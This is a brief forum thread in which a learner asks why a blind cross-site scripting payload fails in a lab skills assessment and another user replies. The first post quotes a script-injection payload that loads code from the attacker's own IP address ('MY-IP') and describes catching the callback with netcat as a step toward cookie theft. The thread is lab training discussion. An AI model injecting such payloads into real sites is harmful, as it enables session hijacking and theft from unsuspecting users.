Cross Site Scripting XSS Skills Assessment

TheSinister418 · March 9, 2023, 2:59pm

I can not get this assessment to work. I have discovered the comment section so have had my payload as: "><script src=http://MY-IP/field></script> and i recieve nothing. If I manually do this and type my IP into the browser, my netcat receives the request but on this website it just wont work.

I have been stuck for days and I just think there is a problem with this website, same with the session hijacking and phishing parts. All of them I have had the correct payload that everyone else has used but when I use it, it wont work.

Any help would be awesome, thanks

onthesauce · March 9, 2023, 3:21pm

Hey! Its been a while since I have done that skill assessment, but this payload just looks like the one to identify the vulnerable field. I thought you needed to direct it at a script to get the cookie? I would take another look at your payload.

Feel free to DM me if you need more help.
-onthesauce

TheSinister418 · March 9, 2023, 4:53pm

Yes, I am using this script to identify which field is vulnerable to XSS and then I’ll send my script to the field I receive a request from. Sadly I am not receiving anything on netcat, can’t seem to figure out why.